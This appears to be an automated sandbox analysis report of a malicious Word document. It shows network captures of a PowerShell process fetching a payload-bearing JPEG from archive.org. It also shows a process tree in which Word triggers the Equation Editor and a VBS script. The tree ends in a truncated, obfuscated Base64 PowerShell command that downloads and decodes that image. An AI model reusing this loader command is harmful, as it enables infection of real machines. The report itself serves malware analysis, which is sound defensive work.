                                                                                            Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD7
                                                                                            Sep 27, 2024 14:00:19.103043079 CEST1236INData Raw: 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51 67
                                                                                            Data Ascii: wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gYN
                                                                                            Sep 27, 2024 14:00:19.103116035 CEST1236INData Raw: 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44
                                                                                            Data Ascii: kD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODj
                                                                                            Sep 27, 2024 14:00:19.103137970 CEST896INData Raw: 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d 75
                                                                                            Data Ascii: o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6UcO
                                                                                            Sep 27, 2024 14:00:19.103149891 CEST1236INData Raw: 67 5a 4e 4b 57 54 65 31 77 57 4e 68 56 54 49 31 77 41 4e 34 54 44 37 30 4d 4b 4e 6a 52 44 55 30 34 43 4e 49 4d 54 35 7a 77 35 4d 58 4f 54 6b 7a 77 34 4d 61 4e 7a 44 79 67 75 4d 30 4b 6a 49 79 38 51 4d 5a 48 6a 6f 78 30 57 4d 6b 46 6a 56 78 45 55
                                                                                            Data Ascii: gZNKWTe1wWNhVTI1wAN4TD70MKNjRDU04CNIMT5zw5MXOTkzw4MaNzDyguM0KjIy8QMZHjox0WMkFjVxEUMRAj+w8OMbDD0wsMMqCTfAAAAwCABwDgPr5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPM
                                                                                            Sep 27, 2024 14:00:19.103162050 CEST1116INData Raw: 30 7a 4c 39 51 43 50 31 7a 7a 31 38 49 4e 50 4e 7a 6a 77 38 59 4b 50 43 79 7a 54 38 6f 45 50 46 78 6a 4f 38 6b 77 4f 6c 76 44 34 37 73 39 4f 51 76 44 74 37 30 35 4f 43 75 54 66 37 67 33 4f 74 74 54 55 37 45 30 4f 67 73 7a 47 37 59 78 4f 4c 6f 54
                                                                                            Data Ascii: 0zL9QCP1zz18INPNzjw8YKPCyzT8oEPFxjO8kwOlvD47s9OQvDt705OCuTf7g3OttTU7E0OgszG7YxOLoT66ctO5qDt68qOkqDi6MnOJpDR68jO0oDG64QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj6
                                                                                            Sep 27, 2024 14:00:19.103359938 CEST1236INData Raw: 34 47 4d 6a 42 44 53 77 51 43 4d 49 41 41 41 41 67 4c 41 45 41 44 41 2f 59 76 50 66 36 54 67 2b 4d 6d 50 65 30 44 4e 39 63 53 50 58 30 6a 43 38 49 46 50 53 77 44 41 37 4d 2f 4f 6f 76 44 78 37 51 35 4f 48 75 54 62 37 49 67 4f 43 6e 7a 48 35 6f 77
                                                                                            Data Ascii: 4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3AkNoUza1ITNMQD0zM/MBID0yITMtHjuxgWM7EjDwwFAAAAMAQAEAAAA/c6P35TK9IePH2Te7EkO1lTS4kLOTijd3QoNeazN2QSNxXTwzciM
                                                                                            Sep 27, 2024 14:00:19.108124018 CEST1236INData Raw: 4c 7a 77 79 45 71 4d 62 4b 54 6a 79 67 6f 4d 43 4b 44 66 79 59 6e 4d 78 4a 7a 61 79 55 6d 4d 66 4a 6a 57 79 51 6c 4d 4f 4a 44 53 79 4d 6b 4d 39 49 7a 4e 79 45 6a 4d 73 49 6a 4a 79 41 69 4d 61 49 54 46 79 38 67 4d 4a 49 7a 41 78 34 66 4d 34 48 6a
                                                                                            Data Ascii: LzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4xsdMVHD0xocMEHjvxkbMzGTrxcaMiGDnxYZMQGzixUYM/FTexQXMuFDaxIWMdFzVxEVMLFjRxAUM6EDNx8SMpEzIx0RMYEjExwQMGETAwsPM1Dz7woOMkDj3wgNMTDTzwcMMBDDvwYLMwCjqwUKMfCTm


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249162207.241.227.964433732C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-09-27 12:00:16 UTC113OUTGET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                                                                                            Host: ia601706.us.archive.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-09-27 12:00:16 UTC582INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.25.1
                                                                                            Date: Fri, 27 Sep 2024 12:00:16 GMT
                                                                                            Content-Type: image/jpeg
                                                                                            Content-Length: 1931225
                                                                                            Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
                                                                                            Connection: close
                                                                                            ETag: "66d918ff-1d77d9"
                                                                                            Strict-Transport-Security: max-age=15724800
                                                                                            Expires: Fri, 27 Sep 2024 18:00:16 GMT
                                                                                            Cache-Control: max-age=21600
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                            Access-Control-Allow-Credentials: true
                                                                                            Accept-Ranges: bytes
                                                                                            2024-09-27 12:00:16 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                            2024-09-27 12:00:16 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                                                                            Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                                                                            2024-09-27 12:00:16 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                                                                            Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                                                                                            2024-09-27 12:00:17 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                                                                            Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                                                                                            2024-09-27 12:00:17 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                                                                            Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                                                                                            2024-09-27 12:00:17 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                                                                            Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                                                                            2024-09-27 12:00:17 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                                                                            Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                                                                                            2024-09-27 12:00:17 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                                                                            Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                                                                                            2024-09-27 12:00:17 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                                                                            Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                                                                            2024-09-27 12:00:17 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                                                                            Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:08:00:07
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                            Imagebase:0x13f920000
                                                                                            File size:1'423'704 bytes
                                                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:08:00:09
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:08:00:12
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS"
                                                                                            Imagebase:0x5f0000
                                                                                            File size:141'824 bytes
                                                                                            MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:08:00:13
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? 